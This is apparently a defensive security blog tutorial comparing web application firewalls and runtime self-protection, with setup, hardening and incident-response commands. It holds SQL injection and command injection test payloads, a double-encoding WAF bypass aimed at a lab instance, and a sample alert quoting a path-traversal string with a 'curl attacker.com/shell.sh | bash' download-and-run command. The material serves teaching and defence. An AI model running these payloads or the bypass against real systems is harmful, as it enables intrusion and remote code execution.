
Introduction:
Web Application Firewalls (WAF) and Runtime Application Self-Protection (RASP) are two pillars of modern application security, but they operate from radically different vantage points. While WAF acts as a perimeter gatekeeper inspecting inbound traffic against known attack signatures, RASP lives inside the application itself, monitoring real-time behavior and context to stop threats that have already penetrated outer layers.
Learning Objectives:
- Understand the architectural differences between WAF and RASP, including deployment models and detection mechanisms.
- Implement and configure open-source WAF (ModSecurity) and RASP (OpenRASP) in Linux/Windows environments.
- Learn to test, bypass, and harden both defenses using real-world attack techniques and mitigation commands.
You Should Know:
- Extended WAF vs RASP Breakdown – From Perimeter to Runtime
The original post correctly identifies WAF as an external traffic filter and RASP as an internal behavior monitor. But let’s dive deeper: WAFs rely on rule sets (e.g., OWASP Core Rule Set) to block SQLi, XSS, and path traversal. However, they struggle with encrypted traffic, zero‑day exploits, and logic flaws. RASP, embedded via agents (Java, .NET, Node.js), observes method calls, data flows, and even stack traces. It can self‑terminate a compromised session or patch vulnerable functions on the fly. The true power comes from layering both: WAF drops the noisy 99% of automated scans; RASP handles the sophisticated 1% that sneaks through.
Step‑by‑step guide: Deploy ModSecurity WAF with Nginx on Ubuntu
```bash
# Update system and install Nginx + ModSecurity
# (package names vary by distribution and Nginx build; these are the ones this guide uses)
sudo apt update && sudo apt install -y nginx libmodsecurity3 nginx-module-modsecurity
# Download the recommended ModSecurity base config plus the unicode mapping file it references
sudo mkdir -p /etc/nginx/modsec
sudo wget -P /etc/nginx/modsec https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/modsecurity.conf-recommended
sudo wget -P /etc/nginx/modsec https://raw.githubusercontent.com/SpiderLabs/ModSecurity/v3/master/unicode.mapping
sudo mv /etc/nginx/modsec/modsecurity.conf-recommended /etc/nginx/modsec/modsecurity.conf
# Download OWASP Core Rule Set (CRS)
sudo wget -P /etc/nginx/modsec https://github.com/coreruleset/coreruleset/archive/refs/tags/v4.0.0.tar.gz
sudo tar -xzf /etc/nginx/modsec/v4.0.0.tar.gz -C /etc/nginx/modsec/
sudo cp /etc/nginx/modsec/coreruleset-4.0.0/crs-setup.conf.example /etc/nginx/modsec/crs-setup.conf
# Switch the engine from detection-only to blocking
sudo sed -i 's/SecRuleEngine DetectionOnly/SecRuleEngine On/' /etc/nginx/modsec/modsecurity.conf
# One entry point that loads the base config, the CRS setup and the CRS rules
sudo tee /etc/nginx/modsec/main.conf > /dev/null <<'EOF'
Include /etc/nginx/modsec/modsecurity.conf
Include /etc/nginx/modsec/crs-setup.conf
Include /etc/nginx/modsec/coreruleset-4.0.0/rules/*.conf
EOF
# Enable ModSecurity in the Nginx config: load the connector module (append to nginx.conf,
# never overwrite it), then switch the engine on in the default server block
sudo sed -i '1i load_module modules/ngx_http_modsecurity_module.so;' /etc/nginx/nginx.conf
sudo sed -i '/^server {/a \    modsecurity on;\n    modsecurity_rules_file /etc/nginx/modsec/main.conf;' /etc/nginx/sites-enabled/default
sudo nginx -t && sudo systemctl restart nginx
```
Test WAF blocking – Send a malicious SQLi payload at your own instance:
```bash
curl -s -o /dev/null -w '%{http_code}\n' "http://localhost/?id=1' OR '1'='1"
# Expected: 403 (Forbidden) or your custom error page; the hit is recorded in /var/log/modsec_audit.log
```
- RASP Implementation Inside a Java Web App (Linux & Windows)
RASP agents attach to the JVM or CLR, instrumenting bytecode to monitor dangerous APIs (e.g., Runtime.exec(), SQL queries). OpenRASP (Baidu) is a free, production‑ready example. Unlike WAF, it understands application context: a SQL injection attempt that reaches the database driver will still be blocked if the parameter violates expected grammar.
Step‑by‑step: Inject OpenRASP into a Tomcat application
```bash
# Linux: download the OpenRASP release and extract it
wget https://github.com/baidu/openrasp/releases/download/v1.5.0/openrasp-v1.5.0.tar.gz
sudo mkdir -p /opt/openrasp
sudo tar -xzf openrasp-v1.5.0.tar.gz -C /opt/openrasp
# Configure rasp.properties (the admin password below is a placeholder; set your own)
echo "rasp.app.name=MyBankApp" | sudo tee -a /opt/openrasp/conf/rasp.properties
echo "rasp.admin.password=StrongP@ssw0rd" | sudo tee -a /opt/openrasp/conf/rasp.properties
# Attach the agent to Tomcat: catalina.sh sources bin/setenv.sh, so persist the -javaagent flag there
# instead of exporting it in the current shell only (CATALINA_HOME is the Tomcat install directory)
echo 'export JAVA_OPTS="$JAVA_OPTS -javaagent:/opt/openrasp/rasp.jar"' | sudo tee -a "$CATALINA_HOME/bin/setenv.sh"
sudo systemctl restart tomcat9
```
Windows (PowerShell as Admin):
```powershell
# Download the OpenRASP zip and extract it
Invoke-WebRequest -Uri "https://github.com/baidu/openrasp/releases/download/v1.5.0/openrasp-v1.5.0.zip" -OutFile "C:\openrasp.zip"
Expand-Archive -Path C:\openrasp.zip -DestinationPath C:\openrasp
# Set the agent flag machine-wide for the Tomcat service; if Tomcat runs as a Windows service,
# add the same -javaagent option to its Java options in the service configuration (tomcat9w.exe)
[Environment]::SetEnvironmentVariable("JAVA_OPTS", "-javaagent:C:\openrasp\rasp.jar", "Machine")
Restart-Service Tomcat9
```
Test RASP – Try a command injection via an application parameter on your own instance:
```bash
# the space after ";" is percent-encoded so curl sends a valid request line
curl -X POST "http://localhost:8080/api/ping?ip=127.0.0.1;%20whoami"
# RASP will detect the illegal command execution, return 500 and write an "Attack detected" log entry
```
- Layered Defense: Cloud WAF + On‑Prem RASP
Modern architectures often place a cloud WAF (AWS WAF, Cloudflare, Azure Front Door) in front, then deploy RASP inside containers or VMs. This combination stops DDoS and volumetric attacks at the edge while RASP handles business logic abuse and credential stuffing that mimics legitimate traffic.
Step‑by‑step: AWS WAF rule to block SQLi + RASP for deep inspection
```bash
# AWS CLI: create a regional WebACL whose rules come from sqli_rule.json.
# The default action must be Allow: with Block, every request the SQLi rule does not match is dropped too.
aws wafv2 create-web-acl --name MyWebACL --scope REGIONAL --default-action Allow={} \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=MyWebACL \
  --rules file://sqli_rule.json
```
Example sqli_rule.json (`--rules` expects a list; `TextTransformations` needs at least one entry, and the match is applied to the query string, which is where the test payloads in this guide arrive):
```json
[
  {
    "Name": "SQLi_Rule",
    "Priority": 0,
    "Action": { "Block": {} },
    "VisibilityConfig": { "SampledRequestsEnabled": true, "CloudWatchMetricsEnabled": true, "MetricName": "SQLiRule" },
    "Statement": {
      "SqliMatchStatement": {
        "FieldToMatch": { "QueryString": {} },
        "TextTransformations": [ { "Priority": 0, "Type": "URL_DECODE" } ]
      }
    }
  }
]
```
Hardening RASP for API endpoints – Modify `rasp.properties` to enable API parameter validation:
```properties
security.enforce_api_protection=true
api.param.whitelist=/api/public,/health
api.param.blacklist=/api/admin
hook.sql_check.enable=true
hook.command_injection.enable=true
```
- Vulnerability Exploitation & Mitigation – Bypassing WAF with Encoding
Attackers often bypass WAFs using double encoding, case shuffling, or HTTP parameter pollution. RASP is less susceptible because it sees the decoded, application‑native data. Both views are shown below.
Simulate a WAF bypass attempt against a poorly configured WAF (run it against your own lab instance from the ModSecurity step):
```bash
# Standard SQLi payload: blocked by the WAF
curl "http://localhost/search?q=' OR 1=1 --"
# Bypass attempt: the same payload URL-encoded twice (%2527 decodes once to %27, not to a quote)
curl "http://localhost/search?q=%2527%2520OR%25201%253D1%2520--"
```
Mitigation with a ModSecurity rule (add it to `crs-setup.conf` or to a custom-rules file loaded after it):
```text
# ARGS has already been URL-decoded once, so a double-encoded quote appears here as %27
# (or %2527 when encoded three times); a percent-sequence that survives one decode is the signal
SecRule ARGS "@rx (?i)%(?:25)?27" "id:100001,phase:2,deny,status:403,t:none,msg:'Double Encoding Bypass Attempt'"
```
RASP log entry when the same attack arrives (excerpt from rasp/logs/alarm.log):
```json
{"event_type":"SQL_INJECTION","url":"/search?q=%2527%2520OR%25201%3D1","payload_decoded":"' OR 1=1 --","stack_trace":"com.mysql.jdbc.PreparedStatement.executeQuery","action":"block"}
```
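To make the vantage-point difference from the breakdown above concrete, here is an added Python model (not code from this post, ModSecurity or OpenRASP) of the three checks just shown: a signature WAF that decodes once, the hardened rule that flags residual encoding, and a runtime check that, in the spirit of OpenRASP's grammar check, compares the token shape of the query the driver receives with the shape a single harmless literal would produce. The application that decodes the parameter a second time and concatenates it into SQL is constructed for the demo; the signature regex and the `simulate` helper are assumptions of this example.

```python
import re
from urllib.parse import unquote

SQLI_SIGNATURE = re.compile(r"'\s*or\s+1\s*=\s*1", re.IGNORECASE)  # toy stand-in for a CRS SQLi rule
TOKEN = re.compile(r"'[^']*'|\d+|\w+|[^\s\w]")  # string literal | number | word | punctuation

def waf_inspect(raw_value: str) -> bool:
    """Perimeter view: URL-decode the parameter once, then match the signature."""
    return SQLI_SIGNATURE.search(unquote(raw_value)) is not None

def waf_inspect_hardened(raw_value: str) -> bool:
    """Signature plus the double-encoding rule: a %27 (or %2527) that survives one decode."""
    once = unquote(raw_value)
    return SQLI_SIGNATURE.search(once) is not None or re.search(r"%(?:25)?27", once, re.I) is not None

def vulnerable_app_query(raw_value: str) -> tuple:
    """Constructed vulnerable app: the framework decodes once, the app decodes again, then concatenates."""
    value = unquote(unquote(raw_value))
    return f"SELECT * FROM items WHERE name = '{value}'", value

def token_shape(sql: str) -> list:
    """Reduce a query to its grammatical shape: literals become STR/NUM, everything else is kept."""
    shape = []
    for tok in TOKEN.findall(sql):
        if tok.startswith("'"):
            shape.append("STR")
        elif tok.isdigit():
            shape.append("NUM")
        else:
            shape.append(tok.upper())
    return shape

def rasp_inspect(sql: str, user_value: str) -> bool:
    """Runtime view (hook on executeQuery): block when the user value changed the query's shape
    relative to a harmless single literal in the same position."""
    if not user_value:
        return False
    benign = sql.replace(user_value, "x", 1)
    return token_shape(sql) != token_shape(benign)

def simulate(raw_value: str) -> dict:
    """Run one request value through all three checks; True means that check blocks it."""
    sql, value = vulnerable_app_query(raw_value)
    return {"waf": waf_inspect(raw_value),
            "waf_hardened": waf_inspect_hardened(raw_value),
            "rasp": rasp_inspect(sql, value)}

if __name__ == "__main__":
    # Constructed inputs: a benign search, the single-encoded payload, the double-encoded bypass
    for raw in ["laptop", "%27%20OR%201%3D1%20--", "%2527%2520OR%25201%253D1%2520--"]:
        print(raw, simulate(raw))
```

The double-encoded input slips past the once-decoding signature, is caught by the residual-encoding rule, and is caught again at the driver because it adds `OR 1=1` tokens to a query that should contain one string literal.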
- Linux & Windows Commands for Hardening WAF/RASP Infrastructure
Beyond the tools themselves, secure the underlying hosts. Use these commands to restrict access to management interfaces, enforce least privilege, and monitor agent health.
Linux (Ubuntu/RHEL):
```bash
# Restrict the WAF admin panel to localhost only (if using ModSecurity with a management console).
# ufw evaluates rules in order, so the loopback allow must precede the deny.
sudo ufw allow from 127.0.0.1 to any port 8080 comment 'WAF Admin local-only'
sudo ufw deny 8080/tcp
# Monitor the RASP agent process for crashes (pgrep -f matches the -javaagent path in the JVM command line)
while true; do pgrep -f "rasp.jar" > /dev/null || echo "RASP down at $(date)" >> /var/log/rasp_watchdog.log; sleep 30; done &
# Audit RASP config permissions: owned by root, readable by the Tomcat service account only
sudo chown root:tomcat /opt/openrasp/conf/rasp.properties && sudo chmod 640 /opt/openrasp/conf/rasp.properties
```
Windows (PowerShell):
```powershell
# Block external access to the WAF (IIS WAF plugin) management endpoint on every non-loopback address
# (the loopback alias is "Loopback Pseudo-Interface 1", hence the wildcard)
$external = (Get-NetIPAddress | Where-Object { $_.InterfaceAlias -notlike "Loopback*" }).IPAddress
New-NetFirewallRule -DisplayName "Block WAF mgmt from outside" -Direction Inbound -LocalPort 8080 -Protocol TCP -Action Block -RemoteAddress Any -LocalAddress $external
# Keep the RASP agent service running: start automatically, and re-launch it from a SYSTEM task at boot
Set-Service -Name "OpenRASPAgent" -StartupType Automatic
$action = New-ScheduledTaskAction -Execute "C:\openrasp\rasp-agent.exe" -Argument "--restart"
$trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -TaskName "RASPWatchdog" -Action $action -Trigger $trigger -User "SYSTEM"
```
- Continuous Training & DevSecOps Integration
To make WAF and RASP effective, security teams must train developers on rule tuning and incident response. Many organizations integrate these tools into CI/CD pipelines, automatically deploying new RASP agents with every build.
Step‑by‑step: Automate RASP agent injection in a Docker build:
```dockerfile
FROM tomcat:9-jdk11
# Fetch the OpenRASP release into /opt/openrasp at build time so every image ships with the agent
RUN mkdir -p /opt/openrasp && \
    wget https://github.com/baidu/openrasp/releases/download/v1.5.0/openrasp-v1.5.0.tar.gz && \
    tar -xzf openrasp-v1.5.0.tar.gz -C /opt/openrasp && \
    rm openrasp-v1.5.0.tar.gz
# Tomcat's entrypoint honours JAVA_OPTS, so the agent is attached on every container start
ENV JAVA_OPTS="-javaagent:/opt/openrasp/rasp.jar -Drasp.config=/opt/openrasp/conf/rasp.properties"
COPY ./app.war /usr/local/tomcat/webapps/ROOT.war
```
Use SAST/DAST findings to generate custom WAF rules – For example, run ZAP against staging and turn every URL it flags for SQLi or XSS into a ModSecurity rule that forces blocking mode on that path:
```bash
# Run the ZAP baseline scan and write an HTML report into the current directory
docker run -v "$(pwd)":/zap/wrk -t owasp/zap2docker-stable zap-baseline.py -t https://staging.app.com -r report.html
# Extract the flagged SQLi and XSS URLs into rules that keep the engine On for those paths.
# Each SecRule needs a unique id (100002+NR); the scheme and host are stripped because REQUEST_URI
# holds only the path. ZAP's report layout changes between versions, so review custom_rules.conf
# before loading it. Never emit ctl:ruleEngine=Off for these URLs: that would switch the WAF off
# exactly where the scanner found a weakness.
grep -E "SQL Injection|Cross Site Scripting" report.html \
  | awk -F 'URL: ' 'NF > 1 { split($2, u, /[" <]/); sub(/^https?:\/\/[^\/]+/, "", u[1]); printf "SecRule REQUEST_URI \"@beginsWith %s\" \"id:%d,phase:1,pass,nolog,ctl:ruleEngine=On\"\n", u[1], 100002 + NR }' \
  >> custom_rules.conf
```
- Incident Response: When WAF Fails and RASP Triggers
A well‑tuned RASP will generate high‑fidelity alerts with full execution context. Create a runbook for responding to RASP alarms.
Sample alert from RASP dashboard:
```text
Critical: Command Injection detected in /api/backup
Parameter: "file=../../etc/passwd; curl attacker.com/shell.sh | bash"
User: tomcat (uid=1001)
Stack: org.apache.commons.exec.DefaultExecutor.execute()
Action: Blocked process, killed session ID: abcd1234
```
Immediate response commands:
```bash
# On Linux: stop the affected container and start a separate forensic container over the RASP logs
docker stop vulnerable_container && docker run --rm --name forensic_container -v /var/log/rasp:/logs ubuntu tail -f /dev/null
# On Windows (cmd/PowerShell): kill the remote process and capture memory
taskkill /PID 1234 /F
dumpit.exe -memory -output C:\forensics\rasp_victim.mem
# Block the callback IP (203.0.113.10 is a placeholder) at the AWS WAF: create an IP set, then reference it
# from a blocking rule via "aws wafv2 update-web-acl". A WAF only filters inbound requests, so stop the
# outbound callback itself in the host firewall or VPC egress rules as well.
aws wafv2 create-ip-set --name CallbackBlock --scope REGIONAL --ip-address-version IPV4 --addresses 203.0.113.10/32
```
What Undercode Say:
- Key Takeaway 1: WAF and RASP are not competitors – WAF is a shield at the gate, RASP is a guard inside the vault. Without RASP, zero‑day and business logic attacks bypass WAF; without WAF, RASP drowns in noise and volumetric attacks.
- Key Takeaway 2: The most effective security posture uses cloud WAF for edge filtering (DDoS, known signatures) plus RASP embedded in microservices or legacy apps for runtime self‑protection, shifting from reactive patching to active defense.
Analysis: The industry often treats WAF as a checkbox compliance tool, but sophisticated threat actors routinely bypass signature‑based filters using encrypted tunnels and API abuse. RASP fills this gap by monitoring actual code execution – something a network appliance cannot see. However, RASP introduces performance overhead (typically 5–15% latency) and requires application language support. The sweet spot is a hybrid model: deploy WAF for global threat intelligence and rate limiting, then enable RASP on high‑value transaction endpoints. Organizations should also invest in regular red‑team exercises that test both layers, because a misconfigured RASP (e.g., disabled command‑injection hooks) leaves the same gap as no WAF at all. The convergence of AI into both technologies will soon allow predictive rule generation and anomaly detection, but today, mastering these fundamentals is non‑negotiable for any blue team.
Prediction:
- +1 By 2028, most cloud WAFs will embed lightweight RASP capabilities as a default service, merging external and internal protection into “context‑aware WAF” with sub‑millisecond inline instrumentation.
- -1 The complexity of managing dual protection will increase false positives by 40% for immature teams, leading to “RASP fatigue” where engineers disable agents to meet SLAs – reversing security gains.
- +1 Open‑source RASP adoption (e.g., OpenRASP, MetaRASP) will surge as AI‑generated zero‑day attacks bypass commercial WAF rules, forcing organizations to rely on behavior‑based internal detection.
- -1 Legacy applications without JVM/.NET agent support will remain unprotected, creating a two‑tier security model where modern apps survive attacks and legacy monoliths become primary breach vectors.
Reported By: Cybersecurity Waf – Hackers Feeds